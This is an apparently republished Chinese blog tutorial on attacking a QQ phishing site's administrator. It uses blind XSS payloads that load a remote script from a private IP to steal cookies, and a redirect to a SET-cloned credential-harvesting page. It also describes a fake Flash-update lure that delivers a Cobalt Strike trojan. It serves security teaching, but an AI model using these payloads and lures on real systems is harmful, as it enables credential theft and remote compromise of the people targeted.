前言

前幾天看到B站up主公孫田浩投稿的視頻「QQ被盜后發布賭博廣告，我一氣之下黑了他們網站」，看完后不禁感嘆為啥自己沒有那么好的運氣......實際上這就是一個中規中矩的XSS漏洞案例，在安全圈子里面應該也算是基本操作，正好博客以前沒有記錄過類似的文章，那么本文就來還原一下這個攻擊過程。

鑒別網站

下面是一個經典的 QQ 空間釣魚網站：

域名分析

釣魚網站最直觀的就是看域名，可以看到目標網站域名: qq.xps.com,盡管域名中出現了qq字樣，但是一級域名卻是xps.com這一點就直接暴露了釣魚網站的本性。

早期還有一種利用拉丁字母注冊的域名偽造釣魚網站的案例，這種就比較逼真了，下面國光簡單列舉一些:

OPPO 官網 真假域名

# 真域名 www.oppo.com# 假域名 www.οppο.com

Pornhub 官網真假域名

# 真域名 www.pornhub.com# 假域名 www.ρornhub.com

唯品會官網 真假域名

# 真域名 www.vip.com# 假域名 www.νip.com

關于這類域名就不再列舉了，早期這種方法成功率是非常的高的，有時候甚至都可以欺騙到我們這種專業的信息安全從業者。

功能分析

釣魚網站既然是要釣魚的話，說那么多半還會有后臺管理功能。所以使用常規的目錄掃描工具多半可以掃描出一些端倪出來:

dirsearch -u "http://qq.cps.com/" -e * -x 301

果然掃描出了這個QQ空間釣魚網站的后臺管理口了:

http://qq.xps.com/admin/login.php

至此基本上已經可以確定這個目標網站就是傳說中的釣魚網站了，下面來看一下這個釣魚網站是如何運作的吧。

釣魚流程

小白用戶前臺輸入自己的QQ賬號和密碼信息，點擊登錄后域名跳轉到真正的QQ官網:

然后用戶再輸入自己的QQ賬號和密碼就可以成功登錄了。

目前很多釣魚網站都是這種思路，這可以讓釣魚者產生一種自己第一次是密碼不小心輸入錯誤的錯覺，從而放松警惕，妙啊!真是妙蛙種子吃著妙脆角，妙進了米奇妙妙屋，妙到家了。

然后釣魚網站的管理員每天會到自己的QQ空間釣魚管理中心里面看看今天又有哪些菜雞上鉤了:

可以看到上鉤者的QQ號為:1314520 密碼為: sbhac...ε=(′ο｀*)))唉，不對勁？貌似自己被羞辱了一番......

攻擊思路

本文主要是來梳理一下XSS

常劍的攻擊思路，關于 XSS 以為的思路不在本文的敘述范圍內，另外如果有小伙伴要不錯新的姿勢的話歡迎評論區里面或者郵件留言，國光日后會繼續完善本文的。

思路一：XSS 盲打

如果目標網站存在XSS的話且沒有httponly防御cookie，那么就可以直接盲打XSS。首先準備一個XSS靶場，國光這里比較推薦Github上面開源的藍蓮花XSS平臺。

官方項目地址為：https://github.com/firesunCN/BlueLotus_XSSReceiver

可惜已經清空數據了，還好國光我 fork 了一份：

國光 fork 的項目地址為：https://github.com/sqlsec/BlueLotus_XSSReceiver

然后使用XSS平臺里面的模塊來生成一個XSS payload:

<script src="http://10.20.24.244/xss/myjs/x.js"> </script>

可以去掉多余的雙引號:

<script src=http://10.20.24.244/xss/myjs/x.js> </script>

然后回到釣魚網站前臺，在用戶名或者密碼處插入payload(理論上來說，密碼處成功率要高一點),如果有表單長度限制的話，可以手工審查元素修改input的長度限制:

這樣黑客攻擊的步驟基本上就走完了，下面回到釣魚網站管理員的視角。

釣魚網站的搭建者到自己的QQ空間釣魚管理中心里面看看今天又有哪些菜雞上鉤了:

發現真的有菜雞上鉤，密碼居然是? 1111111111? ?嘴角忍不住上仰。

此時他不知道的是，用戶賬號旁邊實際上有一串JS代碼被解析了，而此時黑客在XSS平臺里面可以直接看到管理員已經上鉤了:

可以直接看到管理員的后臺地址和cookie信息，拿到后臺地址和Cookie信息就可以直接抓包替換Cookie登錄到釣魚網站的后臺，這些基本操作國光我就不在啰嗦了，下面來說一下另一種思路。

思路二：SET 釣魚

假設目標網站存在httponly的話，我們拿到的cookie信息也是不完整的，所以傳統的思路是行不通的，這種情況下該怎么辦呢？仔細想想，既然不能正面剛httponly的話，那么為什么不考慮繞過他呢？

下面國光主要描述一下如何使用 Kali Linux 里面的 set 社工工程學工具包來進行釣魚。

SET 在 Kali Linux 里面的全稱是 social engineering toolkit：

Github 項目地址為：https://github.com/trustedsec/social-engineer-toolkit

?

點擊即可直接啟動，首先會看到如下的菜單:

Select from the menu:1) Social-Engineering Attacks # 社會工程攻擊2) Penetration Testing (Fast-Track) # 滲透測試（快速通道）3) Third Party Modules # 第三方模塊4) Update the Social-Engineer Toolkit # 更新 SET5) Update SET configuration # 更新 SET 配置6) Help, Credits, and About # 幫助99) Exit the Social-Engineer Toolkit # 退出set> 1

選擇1后進入到下面的菜單:

Select from the menu:1) Spear-Phishing Attack Vectors # 魚叉式網絡釣魚攻擊2) Website Attack Vectors # 網站攻擊3) Infectious Media Generator # 感染性介質生成4) Create a Payload and Listener # 創建 Payload 和 監聽器5) Mass Mailer Attack # 群發郵件6) Arduino-Based Attack Vector # 基于 Arduino 的攻擊7) Wireless Access Point Attack Vector # 無線接入點攻擊8) QRCode Generator Attack Vector # 二維碼生成器攻擊9) Powershell Attack Vectors # Powershell 攻擊10) Third Party Modules # 第三方模塊99) Return back to the main menu. # 返回主菜單set> 2

?

選擇 2 后進入到下面的菜單：

1) Java Applet Attack Method # Java Applet 攻擊2) Metasploit Browser Exploit Method # Metasploit Browser 瀏覽器攻擊3) Credential Harvester Attack Method # 憑證竊取攻擊4) Tabnabbing Attack Method # 標簽頁劫持 5) Web Jacking Attack Method # 網頁劫持攻擊6) Multi-Attack Web Method # 綜合網頁攻擊7) HTA Attack Method # HTA 攻擊99) Return to Main Menu # 返回主菜單set:webattack> 3

?

選擇 3 進入到下面的菜單：

1) Web Templates # 網站模板2) Site Cloner # 站點克隆3) Custom Import # 自定義導入99) Return to Webattack Menu # 返回主菜單set:webattack> 2

選擇 2 然后具體看下下面的操作：

這個時候一個假的釣魚網站就制作完成了，訪問Kali Linux的80端口10.20.25.39效果如下:

這個登錄入口和qq.xps.com/admin/login.php的登錄口一模一樣:

現在的任務就是想辦法讓管理員在假的網站里面輸入網站的后臺用戶名和密碼信息，那么該怎么誘導管理員點擊呢？對，聰明的網友肯定想到了，是利用 XSS，準備下方的 payload，這個 XSS 的作用就是普通的鏈接跳轉：

<script>window.location.href="http://10.20.25.39/" </script>

然后將這個payload插入到釣魚網站的后臺中:

此時管理員到自己的QQ空間釣魚管理中心里面看看今天又有哪些菜雞上鉤了，結果沒想到網站瀏覽器卻跳轉到了:10.20.25.39頁面，這個就是我們制作的假的QQ空間釣魚管理中心的登錄界面。

如果管理員大意的話，這個時候會以為登錄會話超期了，需要重新登錄，就在我們假的網站后臺里面輸入了真正的密碼:

我們這個假的網站也非常妙，登錄后自動轉到到正確的網站登錄成功，真是學以致用呀~~

管理員放松警惕的同時，我們的Kali Linux里也竊取到管理員的明文賬號和密碼信息了:

拿到這個后臺就可以成功登錄了，Bingo~

當然如果管理員是一個有很高安全意識的人，可能是不會上當的，本案例僅供意淫參考使用，實際運用還是得看運氣。

思路三：Flash 釣魚

這也是B站 視頻里面提到過的方法，首先我們需要準備一個釣魚頁面，這里在Github中搜索到了2個相關的項目，下面分別展示一下:

項目地址：https://github.com/Wileysec/adobe-flash-phishing-page

模仿的 Flash Player 中文官網的頁面

項目地址：?https://github.com/r00tSe7en/Flash-Pop

?

這種的就要稍微激進一點，強迫癥都會忍不住去點擊下載的：

國光這里選擇了第2種激進的方法，點擊立即升級的這個按鈕點擊會下載好國光我準備好的CS木馬。如果管理員以為自己的Flash版本過低的話，可能會下載并運行這個木馬:

這里偷懶了沒有給Flash.exe添加圖標偽造一下，關于圖標偽造大家可以參考之前的文章:

為 Cobalt Strike exe 木馬添加圖標

如果順利的話就會成功上線 CS：

總結

免責聲明：本文出現的思路案例僅供網絡安全學習和研究技術使用，禁止使用本文的攻擊技術工具用于非法用途，否則后果自負，另外文中所使用的 QQ 空間釣魚網站是人為修改的漏洞靶場。

總結

以上是生活随笔為你收集整理的XSS实战攻击思路总结的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。